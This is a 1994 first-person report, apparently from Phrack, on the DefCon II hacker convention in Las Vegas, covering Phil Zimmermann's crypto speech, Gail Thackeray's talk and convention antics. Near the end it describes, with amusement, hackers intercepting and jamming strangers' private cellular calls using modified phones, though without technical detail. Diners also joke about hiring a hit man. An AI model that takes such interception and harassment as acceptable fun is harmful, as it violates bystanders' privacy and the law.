"Ugh! That's worse. Can I get a T-shirt cause he's a writer?"
No way hacker-breath.
Jeff. Jeff Moss. Not what I expected. I went to school with a
thousand Jeff Mosses. While I had hair down to my waist, wearing
paisley leather fringe jackets and striped bell bottoms so wide I
appeared to be standing on two inverted ice cream cones, the Jeff
Mosses of the world kept their parents proud. Short, short
cropped hair, acceented by an ashen pall and clothes I stlll
wouldn't wear today. They could get away with anything cause
they didn't look the part of radical chic. Jeff, I really like
Jeff: he doesn't look like what he represents. Bruce Edelstein,
(now of HP fame) used to work for me. He was hipper than hip but
looked squarer than square. Now today that doesn't mean as much
as it used to, but we ex-30-somethings have a hard time forget
ting what rebellion was about. (I was suspended 17 times in the
first semester of 10th grade for wearing jeans.)
Jeff would fit into a Corporate Board Meeting if he wore the
right suit and uttered the right eloquencies: Yes, that's it: A
young Tom Hanks. Right. I used to hate Tom Hanks (Splash, how
fucking stupid except for the TV-picture tube splitting squeals)
but I've come to respect the hell out of him as an actor. Jeff
never had to pass through that first phase. I instantly liked
him and certainly respect his ability to pull off a full fledged
conference for only $5000.
You read right. Five grand and off to Vegas with 300 of your
closest personal friends, Feds in tow, for a weekend of electron
ic debauchery. "A few hundred for the brochure, a few hundred
hear, a ton in phone bills, yeah, about $5000 if no one does any
damage." Big time security shows cost $200,000 and up. I can
honestly say without meaning anything pejorative at any of my
friends and busienss acquaintances, that I do not learn 40 times
as much at the 'real' shows. Something is definitely out of
whack here. Suits want to see suits. Suits want to see fancy.
Suits want to see form, substance be damned. Suits should take a
lesson from my friend Jeff.
* * * * *
I again suffered through a tasteless Saharan buffer dinner which
cost me a whopping $7.95. I hate grits - buttered sand is what I
call them - but in this case might well have been preferable.
Somehow I coerced a few hackers to join me in the ritualistic
slaughter of our taste buds and torture of our intestines. They
were not pleased with my choice of dining, but then who gives a
shit? I couldn't taste anything anyway. Tough.
To keep our minds off of the food we talked about something much
more pleasant: the recent round of attacks on Pentagon computers
and networks. "Are the same people involved as in the sniffing
attacks earlier this year?" I asked my triad of dinner mates.
"Indubitably."
"And what's the reaction from the underground - other hackers?"
Coughs, sniffs. Derisive visual feedback. Sneers. The finger.
"We can't stand 'em. They're making it bad for everybody." Two
fingers.
By and large the DefCon II hackers are what I call 'good hackers'
who hack, and maybe crack some systems upon occasion, but aren't
what I refer to as Information Warriors in the bad sense of the
word. This group claimed to extol the same position as most of
the underground would: the Pentagon sniffing crackers - or
whoever who is assaulting thousands of computers on the net -
must be stopped.
"Scum bags, that what they are." I asked that they not sugarcoat
their feelings on my behalf. I can take it. "These fuckers are
beyond belief; they're mean and don't give a shit how much damage
they do." We played with our food only to indulge in the single
most palatable edible on display: ice cream with gobs of choco
late syrup with a side of coffee. .
The big question was, what to do? The authorities are certainly
looking for a legal response; perhaps another Mitnick or Phiber
Optik. Much of the underground cheered when Mark Abene and
others from the reknowned Masters of Destruction went to spend a
vacation at the expense of the Feds. The MoD was up to no good
and despite Abene's cries that there was no such thing as the
MoD, he lost and was put away. However many hackers believe as I
do, that sending Phiber to jail for hacking was the wrong punish
ment. Jail time won't solve anything nor cure a hacker from his
first love. One might as well try to cure a hungry man from
eating: No, Mark did wrong, but sending him to jail was wrong,
too. The Feds and local computer cops and the courts have to
come up with punishments appropriate to the crime. Cyber-crimes
(or cyber-errors) should not be rewarded by a trip to an all male
hotel where the favorite toy is a phallically carved bar of soap.
On the other hand, hackers in general are so incensed over the
recent swell of headline grabbing break-ins, and law enforcement
has thus far appeared to be impotent, ("These guys are good.")
that many are searching for alternative means of retribution.
"An IRA style knee capping is in order," said one.
"That's not good enough, not enough pain," chimed in another.
(Sip, sip. I can almost taste the coffee.)
"Are you guys serious?" I asked. Violence? You? I thought I
knew them better than that. I know a lot of hackers, none that I
know of is violent, and this extreme Pensacola retribution
attitude seemed tottally out of character. "You really wouldn't
do that, would you?" My dinner companions were so upset and they
claimed to echo the sentiment of all good-hackers in good stand
ing, that yes, this was a viable consideration.
"The Feds aren't doing it, so what choice do we have? I've heard
talk about taking up a collection to pay for a hit man . . ."
Laughter around, but nervous laughter.
"You wouldn't. . ." I insisted.
"Well, probably not us, but that doesn't mean someone else
doesn't won't do it."
"So you know who's behind this whole thing."
"Fucking-A we do," said yet another hacker chomping at the bit.
He was obviously envisioning himself with a baseball bat in his
hand.
"So do the Feds."
So now I find myself in the dilemma of publishing the open secret
of who's behind the Internet sniffing and Pentagon break ins, but
after talking to people from both the underground and law en
forcement, I think I'll hold off awhile It serves no immediate
purpose other than to warn off the offenders, and none of us want
that.
Obviously all is not well in hacker-dom.
* * * * *
The registration area was beyond full; computers, backpacks
everywhere, hundreds of what I have to refer to as kids and a
fair number of above ground security people. Padgett Peterson of
Martin Marietta was going to talk about viruses, Sara Gordon on
privacy, Mark Aldrich is a security guy from DC., and a bunch of
other folks I see on the seemingly endless security trade show
circuit. Jeff Moss had marketed himself and the show excellently.
Los Angeles sent a TV crew, John Markoff from the New York Times
popped in as did a writer from Business Week. (And of course,
yours truly.)
Of the 360 registrees ("Plus whoever snuck in," added Jeff) I
guess about 20% were so-called legitimate security people. That's
not to belittle the mid-20's folks who came not because they were
hackers, but because they like computers. Period. They hack for
themselves and not on other systems, but DefCon II offered some
thing for everyone.
I remember 25 years ago how my parents hated the way I dressed
for school or concerts or just to hang out: God forbid! We wore
those damned jeans and T-shirts and sneakers or boots! "Why can't
you dress like a human being," my mother admonished me day after
day, year after year. So I had to check myself because I can't
relate to Seattle grunge-ware. I'm just too damned old to wear
shirts that fit like kilts or sequin crusted S&M leather straps.
Other than the visual cacophony of dress, every single
hacker/phreak that I met exceeded my expectations in the area of
deportment.
These are not wild kids on a rampage. The stories of drug-in
duced frenzies and peeing in the hallways and tossing entire
rooms of furniture out of the window that emanated from the
HoHoCons seemed a million miles away. This was admittedly an
opportunity to party, but not to excess. There was work to be
done, lessons to be learned and new friends to make. So getting
snot nosed drunk or ripped to the tits or Ecstatically high was
just not part of the equation. Not here.
Now Vegas offers something quite distinct from other cities
which host security or other conventions. At a Hyatt or a Hilton
or any other fancy-ass over priced hotel, beers run $4 or $5 a
crack plus you're expected to tip the black tied minimum wage
worker for popping the top. The Sahara (for all of the other
indignities we had to suffer) somewhat redeemed itself by offer
ing an infinite supply of $1 Heinekens. Despite hundreds of beer
bottle spread around the huge conference area (the hotel was
definitely stingy in the garbage pail business) public drunken
ness was totally absent. Party yes. Out of control? No way.
Kudos!
Surprisingly, a fair number of women (girls) attended. A handful
were there 'for the ride' but others . . . whoa! they know their
shit.
I hope that's not sexist; merely an observation. I run across so
few technically fluent ladies it's just a gut reaction. I wish
there were more. In a former life, I owned a TV/Record produc
tion company called Nashville North. We specialized in country
rock taking advantage of the Urban Cowboy fad in the late 1970's.
Our crew of producers and engineers consisted of the "Nashville
Angels." And boy what a ruckus they would cause when we recorded
Charlie Daniels or Hank Williams: they were stunning. Susan
produced and was a double for Jacqueline Smith; we called Sally
"Sabrina" because of her boyish appearance and resemblance to
Kate Jackson. A super engineer. And there was Rubia Bomba, the
Blond Bombshell, Sherra, who I eventually married: she knew
country music inside and out - after all she came from Nashville
in the first place.
When we would be scheduled to record an act for live radio, some
huge famous country act like Asleep at The Wheel of Merle Haggard
or Johnny Paycheck or Vassar Clements, she would wince in disbe
lief when we cried, "who's that?" Needless to say, she knew the
songs, the cues and the words. They all sounded alike. Country
Music? Ecch. (So I learned.)
At any rate, ladies, we're equal opportunity offenders. C'mon
down and let's get technical.
As the throngs pressed to register, I saw an old friend, Erik
Bloodaxe. I've known him for several years now and he's even
come over to baby sit the kids when he's in town. (Good prac
tice.) Erik is about as famous as they come in the world of
hackers. Above ground the authorities investigated him for his
alleged participation in cyber crimes: after all, he was one of
the founders of the Legion of Doom, and so, by default, he must
have done something wrong. Never prosecuted, Erik Bloodaxe lives
in infamy amongst his peers. To belay any naysayers, Erik ap
peared on every single T-shirt there.
"I Only Hack For Money,"
Erik Bloodaxe
proclaimed dozens of shirts wandering through the surveillance
laden casinos. His is a name that will live in infamy.
So I yelled out, "Hey Chris!" He gave his net-name to the
desk/table registrar. "Erik Bloodaxe."
"Erik Bloodaxe?" piped up an excited high pitched male voice.
"Where?" People pointed at Chris who was about to be embarrass
ingly amused by sweet little tubby Novocain who practically bowed
at Chris's feet in reverence. "You're Erik Bloodaxe?" Novocain
said with nervous awe - eyes gleaming up at Chris's ruddy skin
and blond pony-tail.
"Yeah," Chris said in the most off handed way possible. For
people who don't know him this might be interpreted as arrogance
(and yes there is that) but he also has trouble publicly accept
ing the fame and respect that his endearing next-generation
teenage fans pour on him.
"Wow!" Novocain said with elegance and panache. "You're Erik
Bloodaxe." We'd just been through that said Chris's eyes.
"Yeah."
"Wow, well, um, I . . . ah . . . you're . . . I mean, wow,
you're the best." What does Sylvia Jane Miller from Rumpsteer,
Iowa say to a movie star? This about covered it. The Midwest
meets Madonna. "Wow!" Only here it's Novocain meets Cyber
Christ himself.
Like any other security show or conference or convention there is
a kickoff, generally with a speech. And DefCon II was no excep
tion. Except.
Most conventional conventions (ConCons) start at 7:30 or 8:00 AM
because, well, I don't know exactly why, except that's when so-
called suits are expected to show up in their cubicles. Def
Con, on the other hand, was scheduled to start at 10PM on Friday
night when most hakcers show up for work. Most everyone had
arrived and we were anxiously awaiting the opening ceremonies.
But, here is where Jeff's lack of experience came in. The kick-
off speaker was supposed to be Mark Ludwig of virus writing fame
and controversy. But, he wasn't there!
He had jet lag.
"From Phoenix?" I exclaimed in mock horror to which nearby hack
ers saw the absurdity of a 45 minute flight jet lag. Mark has a
small frame and looks, well, downright weak, so I figured maybe
flying and his constitution just didn't get along and he was
massaging his swollen adenoids in his room.
"Oh, no! He's just come in from Australia . . ." Well that
explains it, alright! Sorry for the aspersions, Mark.
But Jeff didn't have a back up plan. He was screwed. Almost four
hundred people in the audience and nothing to tell them. So, and
I can't quite believe it, one human being who had obviously never
stood in front of a live audience before got up in an impromptu
attempt at stand up comedy. The audience was ready for almost
anything entertaining but this guy wasn't. Admittedly it was a
tough spot, but . . .
"How do you turn a 486 into an 8088?"
"Add Windows." Groan. Groan.
"What's this?" Picture the middle three fingers of your right
hand wiggling madly.
"An encrypted this!" Now hold out just the middle finger.
Groan. Groan.
"What's this?" Spread your legs slightly apart, extend both
hands to the front and move them around quickly in small circles.
"Group Air Mouse." Groan.
The evening groaned on with no Mark nor any able sharp witted
comedian in sight.
Phil Zimmerman wrote PGP and is a God, if not Cyber-Christ him
self to much of the global electronic world. Preferring to call
himself a folk hero (even the Wall Street Journal used that term)
Phil's diminutive height combined with a few too many pounds and
a sweet as sweet can be smile earn him the title of Pillsbury
Dough Boy look alike. Phil is simply too nice a guy to be em
broiled in a Federal investigation to determine if he broke the
law by having PGP put on a net site. You see, the Feds still
think they can control Cyberspace, and thereby maintain antique
export laws: "Thou shalt not export crypto without our approval"
sayeth the NSA using the Department of Commerce as a whipping boy
mouth piece. So now Phil faces 41-51 months of mandatory jail
time if prosecuted and convicted of these absurd laws.
Flying in from Colorado, his appearance was anxiously awaited.
"He's really coming?" " I wonder what he's like?" (Like every
one else, fool, just different.) When he did arrive, his shit-
eating grin which really isn't a shit-eating grin, it's just
Phil's own patented grin, preceeded him down the hallway.
"Here he is!" "It's Phil Zimmerman." Get down and bow. "Hey,
Phil the PGP dude is here."
He was instantly surrounded by those who recognize him and by
those who don't but want to feel like part of the in-crowd.
Chat chat, shit-eating grin, good war stories and G-rated pleas
antries. Phil was doing what he does best: building up the folk
hero image of himself. His engaging personality (even though he
can't snorkel to save his ass) mesmerized the young-uns of the
group. "You're Phil?"
"Yeah." No arrogance, just a warm country shit-eating grin
that's not really shit-eating. Just Phil being Phil. He plays
the part perfectly.
Despite the attention, the fame, the glory (money? nah . . .) the
notoriety and the displeased eyes of onlooking Computer Cops who
really do believe he belongs in jail for 4 years, Phil had a
problem tonight. A real problem.
"I don't have a room!" he quietly told Jeff at the desk. "They
say I'm not registered." No panic. Just a shit-eating grin
that's not a shit-eating grin and hand the problem over to the
experts: in this case Jeff Moss. Back to his endearing fans.
Phil is so damned kind I actually saw him giving Cryptography 101
lessons on the corner of a T-shirt encrusted table. "This is
plaintext and this is crypto. A key is like a key to your hotel
room . . . " If only Phil had a hotel room.
Someone had screwed up. Damn computers. So the search was on.
What had happened to Phil's room? Jeff is scrambling and trying
to get the hotel to rectify the situation. Everyone was abuzz.
Phil, the crypto-God himself was left out in the cold. What
would he do?
When suddenly, out of the din in the halls, we heard one voice
above all the rest:
"Phil can sleep with me!"
Silence. Dead stone cold silence. Haunting silence like right
after an earthquake and even the grubs and millipedes are so
shaken they have nothing to say. Silence.
The poor kid who had somehow instructed his brain to utter the
words and permitted them to rise through his esophagus and out
over his lips stood the object of awe, incredulity and mental
question marks. He must have thought to himself, "what's every
one staring at? What's going on? Let me in on it." For the
longest 10 seconds in the history of civilization he had abso
lutely no clue that he was the target of attention. A handful of
people even took two or three steps back, just in case. Just in
case of what was never openly discussed, but nonetheless, just in
case.
And then the brain kicked in and a weak sheepish smile of guilt
overcame this cute acne-free baby-butt smooth-faced hacker who
had certainly never had a shave, and was barely old enough to
steer his own pram.
"Ohhhhhh . . . . noooooo," he said barely louder than a whisper.
"That' not what I mean!"
I nearly peed laughing so hard in unison with a score of hackers
who agreed that these misspoken words put this guy in the unenvi
able position of being the recipient of a weekend of eternal
politically incorrect ridicule.
"Yeah, right. We know what you mean . . "
"No really . . ." he pleaded as the verbal assaults on his al
leged sexual preferences were slung one after the other.
This poor kid never read Shakespeare: "He who doth protest too
much . . ."
If we couldn't have a great kickoff speech, or comedian, this
would have to do.
The majority of the evening was spent making acquaintances:
"Hi, I'm Jim. Oops, I mean 'Septic Tank," was greeted with "Oh,
you're Septic. I'm Sour Milk." (Vive la difference!) People who
know each other electronically are as surprised to meet their
counterparts as are first daters who are in love with the voice
at the other end of the phone. "Giving good phone" implies one
thing while "Having a great keystroke" just might mean another.
The din of the crowd was generally penetrated by the sounds of a
quasi-pornographic Japanese high tech toon of questionable so
cially redeeming value which a majority of the crowd appeared to
both enjoy and understand. I am guilty of neither by reason of
antiquity.
And so it goes.
* * * * *
Phil Zimmerman must have gotten a room and some sleep because at
10AM (or closely thereafter) he gave a rousing (some might say
incendiary) speech strongly attacking the government's nearly
indefensible position on export control
I was really impressed. Knowing Phil for some time, this was the
first time I ever heard him speak and he did quite an admirable
job. He ad libs, talks about what he want to talk about and does
so in a compelling and emotional way. His ass is on the line and
he should be emotional about it. The audience, indeed much of
counter culture Cyberspace loves Phil and just about anything he
has to say. His affable 40-something attorney from Colorado,
Phil DuBois was there to both enjoy the festivities and, I'm
sure, to keep tabs on Phil's vocalizations. Phil is almost too
honest and open for his own good. Rounds and rounds of sincere
appreciation.
Hey kids, now it's time for another round of Spot The Fed.
Here's your chance to win one of these wonderful "I Spotted A
Fed" T-shirts. And all you have to do is ID a fed and it's yours.
Look around you? Is he a Fed? Is she under cover or under the
covers? Heh, heh. Spot the Fed and win a prize. This one-size-
fits-all XXX Large T-shirt is yours if you Spot the Fed. I had
to keep silent. That would have been cheating. I hang out on
both sides and have a reputation to maintain.
"Hey, I see one" screeched a female voice (or parhaps it was
Phil's young admirer) from the left side of the 400+ seat ball
room. Chaos! Where? Where? Where's the fed? Like when Jose
Consenko hits one towards the center field fence and 70,000
screaming fans stand on their seats to get a better view of a
three inch ball 1/4 mile away flying at 150 miles per hour, this
crowd stood like Lemmings in view of Valhalla the Cliff to espy
the Fed. Where's the Fed?
Jeff jumped off the stage in anxious anticipation that yet anoth
er anti-freedom-repressive law enforcement person had blown his
cover. Where's the Fed? Jeff is searching for the accuser and
the accused. Where's the Fed? Craned necks as far as the eye
can see; no better than rubber neckers on Highway 95 looking for
steams of blood and misplaced body parts they half expected a Fed
to be as distinctly obvious as Quasimoto skulking under the
Gorgoyled parapits of Notre Dame. No such luck. They look like
you and me. (Not me.) Where's the Fed?
He's getting closer, closer to the Fed. Is it a Fed? Are you a
Fed? C'mon, fess up. You're a a fed. Nailed. Busted. Psyche!
Here's your T-shirt. More fun than Monty Hall bringing out
aliens from behind Door #3 on the X-Files. Good clean fun. But
they didn't get 'em all. A couple of them were real good. Must
have been dressed like an Hawaiian surf bum or banshee from
Hellfire, Oregon. Kudos to those Feds I know never got spotted.
Next year, guys. There's always next year.
Phil's notoriety and the presence of the Phoenix, Arizona prosecu
tor who was largely responsible for the dubiously effective or
righteous Operation Sun Devil, Gail Thackeray ("I change job
every 4 years or so - right after an election") brought out the
media. The LA TV station thought they might have the makings of
a story and sent a film crew for the event.
"They're Feds. The ones with the cameras are Feds. I know it. Go
ask 'em." No need. Not.
"Put away that camera." At hacking events it's proper etiquette
to ask if people are camera shy before shooting. The guy that I
was sitting next to buried his face in his hands to avoid being
captured on video tape.
"What are you; a Fed or a felon?" I had to ask.
"What's the difference," his said. "They're the same thing." So
which was it, I wondered. For the truly paranoid by the truly
paranoid.
"Get that thing outta here," he motioned to the film crew who
willingly obliged by turning off the lights. "They're really
Feds," he whispered to me loud enough for the row in front and
behind us to hear.
I moved on. Can't take chances with personal safety when I have
kids to feed. Fed or felon, he scared me.
Gail Thackeray was the next act on stage. She was less in agree
ment about Phil Zimmerman than probably anyone (except the unde
tected Feds) in the audience. She, as expected, endorsed much of
the law enforcement programs that revolve around various key
management (escrow) schemes. Phil recalls a letter from Burma
that describe how the freedom fighters use PGP to defend them
selves against repression. He cites the letter from Latvia that
says electronic freedom as offered by PGP is one of the only
hopes for the future of a free Russia. Gail empathizes but sees
trouble closer to home. Terrorism a la World Trade Center, or
rocket launchers at O'Hare Airport, or little girl snuff films in
Richmond, Virginia, or the attempt to poison the water supply
outside of Boston. These are the real threats to America in the
post Cold War era.
"What about our personal privacy!" cries a voice. "We don't want
the government listening in. It's Big Brother 10 years behind
schedule."
Gail is amused. She knew it would be a tough audience and has
been through it before. She is not shaken in the least.
"I've read your mail," she responds. "Its not all that interest
ing." The audience appreciates a good repartee. "You gotta pay
me to do this, and frankly most of it is pretty boring." She
successful made her point and kept the audience laughing all the
way.
She then proceeded to tell that as she sees it, "The expectation
of privacy isn't real." I really don't like hearing this for I
believe in the need for an Electronic Bill of Rights. I simply
think she's wrong. "History is clear," she said "the ability to
listen in used to be limited to the very few. The telegraph was
essentially a party line and still today in some rural areas
communications aren't private. Why should we change it now?"
"Gail, you're so full of shit!" A loud voice bellowed from next
to me again. Boy can I pick seats. "You know perfectly well that
cops abuse the laws and this will just make their jobs easier.
Once people find a way to escape tyranny you all want to bring it
right back again. This is revolution and you're scared of los
ing. This kind of puke scum you're vomiting disgusts me. I just
can't take it any more. " Yeah, right on. Scattered applause.
While this 'gent' may have stated what was on many minds, his
manner was most unbefitting a conference and indeed, even DefCon
II. This was too rude even for a hacker get-together. The man
with the overbearing comments sat down apologizing. "She just
gets me going, she really does. Really pisses me off when she
goes on like about how clean the Feds are. She knows better than
to run diarrhea of the mouth like that."
"You know," she continued. "Right across the street is a Spy
Shop. One of those retail stores where you can buy bugs and taps
and eavesdropping equipment?" The audience silently nodded. "We
as law enforcement are prohibited by law from shopping there and
buying those same things anyone else can. We're losing on that
front." Cheers. Screw the Feds.
==Phrack Magazine==
Volume Five, Issue Forty-Six, File 20 of 28
****************************************************************************
(Cyber Christ Meets Lady Luck Continued)
I don't agree with everything that Gail says, but she is a com
pelling speaker; she believes in what she says. But I do agree
with her on the difficulty of forensic evidence in computer
cases.
"I got really mad," she said. "I was reading a magazine and
there was an ad for United, you know, the employee owned airline.
And it was a beautiful ad, hundred of employees standing in front
of a brand new great big jet. All smiling and happy." Gail then
frowned deeply. "Some stockholder ought to sue them for mislead
ing advertising." This was more like it! Go, Gail! "I started
to look at the picture carefully and I noticed this unmistakably
fat lady in a pink dress. And then over a few persons. . .guess
what? The same fat lady in pink." Roars of laughter and ap
plause.
Her point? What seems real may not be real at all, and with a few
hundred dollars in software and a little practice, most anyone
can build a false reality digitally.
Her time was up but the audience wanted more. She was mobbed for
eternity by hackers who fight her tooth and nail but respect her
comportment enough to make the disagreements lively, partisan,
entertaining, but with respect. Respectful hackers. No HoHoCon
orgies; merely verbal barbs with no solution. Everyone knew that,
but it's the battle that counts.
More security conference should be this open, this honest and
informative, with all kinds of people with all kinds of opinions.
That is how we, and I, learn. Listen and learn. And all for
$5000 no less, plus a paltry $15 entrance fee.
* * * * *
The afternoon sessions were filled with a mixture of anti-govern
ment, pro-privacy advocacy, virus workshops and such by both
under and above ground folks. Padgett Peterson's knowledge of
viruses is deep and he spread the same wisdom as his does in so
called legitimate circles. Knowledge is knowledge, and better
accurate than wrong.
It's often surprising to see how people will voice the same
opinion in varying degree of intensity depending upon their
audience. Mark Aldrich of General Research Corp. in the Washing
ton area made a statement that I doubt I would hear at a ConCon.
"Fear your government that fears your crypto. Use crypto as
a weapon." Sara Gordon's panel discussion on crypto and privacy
and related topics fueled the audience's general anti-fed atti
tude.
"I was bugged by the Feds." "So was I?" "What can we do about
it." "Yeah, they listen in on my phones, too. I can hear the
clicks." Right.
As Mark so succinctly put it, "if the government wants to bug
you, you'll never know. They're that good.". That kind of shut
up the dilettante paranoids in the group, albeit mumbling that
they just knew that they were the victim of one of the 900 or so
court approved wire taps last year. Right. I think Gail was
right: some of you guys are too boring to be believed.
The afternoon edition of the Spot A Fed contest took us on the
run. I actually succombed to their enthusiasm and a general lack
of better judgement and followed a group of 8 or 10 to unmask an
unmarked white van in the parking lot.
"It's the Feds." "How do you know?" "Oh, it's the Feds alright."
"How do you know." "It's a white van and the intelligence serv
ices use white vans." "What are you going to do?" "Bust 'em."
"Bust 'em for what?" "For being Feds."
This motley crew traipsed through the mile long casino, trodding
upon the ugly tartan/paisley carpets so obnoxiously loud a blind
man could cry "Uncle!", into the Hall of Overpriced Shoppes
through the lobby and over to the parking garage. We had to have
$100,000 of surveillance gear in tow:(enough to detect the planet
Pluto fart in b-flat). Radio receivers and eavesdropping equip
ment were courtesy of my pal Mike Peros. The goal was, if this
was a Fed van, we could hear it. I don't think so, but I go for
the ride and a few minutes of reprieve away from the conference
hall.
As we near, the excitement grows among the more paranoid who are
trying to instill their own mental foibles into their companions
and sheer terror in normal old Vegas visitors who have no idea
what they've walked into.
Feds? Not. Surrepticious radio transmissions? Just hotel securi
ty tracking the movements of 8 or 10 paranoids (and one writer
with nothing else to do for a half hour) into a parking garage
which has more cameras than NBC. Feds? Of course not. Don't be
ridiculous.
* * * * *
To say nothing worthwhile occurred until 11PM that evening would
be lying, but this thing, this DefCon II thing, was turning into
what I would have called 25 years ago, a Love-In. The partici
pants were giddy from the event, the camaraderie, the $1 Heinek
ens and the hacking. The Sahara was actually pretty good about
it. Jeff got the conference space for free because he guaranteed
that at least 100 hotel rooms would be booked by "computer en
thusiasts coming to a small computer conference." Little did the
hotel know that half the crowd was too young to drink, too broke
to gamble, and conspicuous enough to ward off legitimate clients.
But a deal's a deal.
The hotel operators went out of their way and allegedly gave the
hackers permission to hack through the PBX in order to provide a
SLPP connection.
"Just put it back the way you found it when you're done," was the
hotel's only and quite reasonable request.
In my day an equivalent event producing an equivalent social non-
drug induced high would have been achieved by tossing a Frisbee
to Grace Slick (Lead singer Jefferson Airplane) and have her
throw it back. We didn't have the kind of technology that today's
rebellious age has. We had the Beatles and Jimi Hendrix, safe
sex (kinda), safe drugs (well, maybe a little safer) and a cause.
But no technology to speak of.
When I was on the publishing staff of the New York City Free
Press in 1968/9 we wrote our anti-establishment diatribes by
hand. By hand! And then we went down to a dark office late at
night to use their typesetting gear when it was idle. It took no
more than a blushing glance around the room to realize that we
impressionable teens were publishing our political extremisms on
equipment courtesy of Al Goldstein and Screw magazine. Now that
was an education.
DefCon II was a Love-In, technology and all.
Come 11PM yet another speaker canceled so I offered to chat to
the crowd for a half hour or so on Van Eck radiation; the emis
sions from CRT's that make video screens readable from a dis
tance. Now this wasn't a fill in at 2PM or anything. Sessions
reconvened at 11PM and I spoke to a full audience who were there
to get a midnight lesson in cellular hacking.
Most above ground types still believe that hacking is an acne-
faced teenager, chigging Jolt Cola, wolfing down pepperoni
pizza and causing Corporate America no end of grief. To a cer
tain extent some of this is true. But hacking is so much more.
As Rop Gongrijjp, editor of Hacktic once told me, "hacking is
disrespect of technology." It's going the extra mile to find out
how things work. Many of the older hackers, those in their early
20's and older, are migrating from the conventional dial-em-up
and break-in hacking image to the fine art of cellular hacking.
How do these things work? What are the frequencies? How can I
customize my phone? How many channels can I scan? The possibil
ities are endless as I soon learned.
Jim and Bill (fake names) asked if I wanted to see a great demo.
Sure! No names, they said. OK. No problem. In one of the
several thousand hotel rooms at the Sahara was a pile of equip
ment to make an under budgeted FBI surveillance team insanely
jealous. There in the middle of the ridiculously filthy room that
no doubt caused the maid to shudder, sat a log periodic antenna
poised atop a strong and highly adjustable photographic-style
tripod. Feeding the antenna was a hunk of coax attached to a
cell phone's antenna jack.
OK, so what's that? Free cell calls? No, much more.
A second cell phone/scanner, an Oki 900 was modified and connect
ed to a laptop computer. (This was the exact modification being
discussed downstairs) Custom software that was freely distrib
uted around DefCon scanned the data from the Oki and displayed
the scanning activity. A pair of speakers then audibly broadcast
the specific conversation. And in Vegas, you can imagine what
was going over the open airwaves!
A half dozen 'kids' sat around enthralled, each begging for his
turn to, as Jim put it, "harass cellular users. Pure and simple.
Harassment. Stomp on the son of a bitch," he laughed, joined in
by the others.
When a 'good' conversation was detected, they entered the channel
into the broadcasting cell phone and spoke. And talk they did.
Essentially they turned 'private' conversations into wide-band
free-for-alls. If they spoke for only a few seconds one or both
of the parties could hear what was being said. If they talked
for too long, the overpowering signal from the antenna would
literally wipe out the chat: the cell switch reacted with an
internal belch and shut down. Stomping, they called it.
For those on the receiving end of the harassment, it must have
sounded like the overbearing voice of God telling Noah how to
build the Ark.
"Noah?"
"Who dat?
"Noah?"
"Who is that?"
What terror lurks in the minds of boys . . .
For those old enough to remember, stomping is no more a stunt
than putting a 500 watt linear power amplifier on a CB radio and
blasting nearby CB's to kingdom come. The truckers used to do it
to 4-wheelers. When the police began monitoring CB channels "to
protect and serve" they became the target of CB stomping. So
what else is new?
I gotta give it to them: these characters designed and built the
software, modified the phones and put it all together and it
works! Not bad on a $3 allowance and a 10th grade education.
Now, I guess what they did may have been sort of illegal, or at
least highly unethical and definitely not nice. But I have to
admit, some of what I witnessed was very, very, funny. I'm not
advocating this kind of activity, but much like Candid Camera
broke into people's lives to capture their reactions, cellular
hacking is similarly amusing. The hacker/phreaks particularly
enjoyed breaking in on fighting couples. (I counted six impend
ing divorces.) Almost without exception the man was in a car and
the lady was at a fixed location; presumably, home.
Him: "Where the hell have you been."
Her: "Nowhere."
Him: "Bullshit.
Her: "Really honey . . ." Defensively.
Him: "Who's with you?" Intense anger.
Hacker: "Don't believe her. She's a whore."
Him: "What was that?"
Her: "What?"
"That voice."
"What voice?"
Hacker: "Me you asshole. Can't you see she's playing you for a
fool."
"I know she is." He agrees.
"What's that honey?"
"I know he's there with you."
"Who?" Incredulous.
"Him . . . whoever you're fucking when I'm at work."
Hacker: "Yeah, it's me."
"Shit! Who the fuck is there?"
"No one!"
"I can hear him, he's there. You're both making fun of me . . ."
Hacker: "She's laughing at you, man."
"No shit. Who the fuck are you?"
Hacker: "The guy who takes care of her when you can't, asshole."
"That's it." Click.
Drug dealers aren't immune to these antics.
"Where's the meet?"
"By the 7/11 on Tropicana."
"You got it?"
"You got the cash?"
"Yeah, dude."
"Be sure you do."
Hacker: "He doesn't have the cash my man. He's gonna rip you
off."
"What?" "What?" Both sides heard the intruder's voice. "Who is
that?"
"What's that about a rip-off?"
"This ain't no rip-off man."
Hacker: "Yes it is. Tell 'em the truth. You gonna take his drugs
and shoot his ass. Right? Tell 'em."
"You gonna rip me off?"
"No, man!"
"Your homeboy says you gonna try and rip me off?"
"What home boy?"
Hacker: "Me, you bozo drug freak. Don't you know that shit can
kill you?"
Click.
Good samaritanism pays off upon occasion.
"Honey, hurry up."
"I'm on the freeway. I'm coming."
Hacker: "He's late. Let's save her ass."
"What was that?" "What did you say honey?"
"He said he was going to save your ass."
"Who did?"
"The guy on the radio." (Technical ignorance abounds.)
Hacker: "Me. You're late and she's scared so we're gonna beat
you there and make her safe."
"Who the hell is that?" "Who?" "The guy with you?" "There's no
one here." "He says he's gonna beat me there and pick you up."
Hacker: "Damn right we are."
"Hey, this is cool. Who's there?"
Hacker: "Cyber Christ talking to you from Silicon Heaven."
"No shit. Really?"
Hacker: "Yeah, (choke, choke,) really."
"What's happening, honey."
"I don't know, for sure. He says it's God."
"God!?!?"
Hacker: "Close enough. Listen, you sound alright. Go get your
woman, man Keep her safe."
"No problem. Uh, thanks."
Click.
Around 4AM, I guess it was, the hacker/phreaks definitely helped
out law enforcement. One end of the conversation was coming from
inside a hotel, maybe even the Sahara. The other from another
cell phone, most likely in the lobby.
"What do you look like?"
"I'm five foot nine, thinning brown hair and 180 pounds I wear
round glasses and . ."
"I get the idea. Where are you now?"
"I'm coming down the elevator now. What do you look like?"
"I'm six foot one in my heels, have long blond spiked hair and
black fishnet stockings."
Hacker: "Don't go man. It's a bust."
"What?" he said.
Hacker: "Don't go, it's a bust. You don't want your name in the
papers, do ya?"
"What the fuck?" she yelled.
"There's a guy who says this is a bust?"
"Bust? What bust?"
Hacker: "That's the clue, man. She's denying it. Of course it's
a bust. Is it worth a night in jail to not get laid?"
"Shit." He whispers not too quietly to another male companion.
"There's some guy on the phone who says it's bust. What should we
do."
Hacker: "I'm telling you man, don't go,"
"This ain't worth it. I'm going back upstairs."
Click.
A couple of hours later the same hooker was overheard talking to
one of her work mates.
"Then this asshole says it's a bust. Cost me $300 in lost busi
ness, shit."
"You, too? Same shit been going on all night long. What the
fuck?"
Wow. And it seems like only this morning that my toilet explod
ed.
* * * * *
So what's a perfectly groomed and slightly rotund 50-something
